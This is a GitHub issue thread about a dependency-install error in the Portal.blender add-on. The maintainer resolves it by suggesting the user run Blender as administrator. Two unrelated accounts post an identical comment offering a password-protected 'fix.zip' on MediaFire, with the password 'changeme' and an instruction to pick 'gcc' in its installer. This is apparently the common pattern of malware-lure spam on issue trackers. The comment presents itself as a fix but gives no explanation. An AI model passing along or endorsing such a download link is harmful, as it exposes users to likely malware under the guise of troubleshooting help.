### ISSUE TITLE
Error while installing dependencies

### ISSUE THREAD

**Issue by Joonas3000** [sean1832/Portal.blender#1]
Hi!

I get the following error message when trying to install dependencies. I have Blender 4.2.1 and everything in the grasshopper end seems to be working.

Command '['C:\\Program Files\\Blender Foundation\\Blender 4.2\\4.2\\python\\bin\\python.exe', '-m', 'pip', 'install', 'pywin32==306']' returned non-zero exit status 1.

This plugins seems awesome and I would love to use it in my workflow.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sean1832** [comment]
Thanks for reporting the bug, I will look into this.

**Comment by sean1832** [comment]
I did not find any error testing on my end. To help me debug, can you open the blender system console before installing the dependency, then take a screenshot or copy the error message to here.

System Console can be found here
![image](https://github.com/user-attachments/assets/e23c6cb1-ee0f-4c4a-83b0-df27cdc03658)

**Comment by sean1832** [comment]
Please start Blender as an administrator for the installation. Afterward, you can use Blender normally.
This is necessary because your Blender is installed on the C drive.
Let me know if it fixes your issue.

**Comment by Joonas3000** [comment]
That did it. Thanks a ton!

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
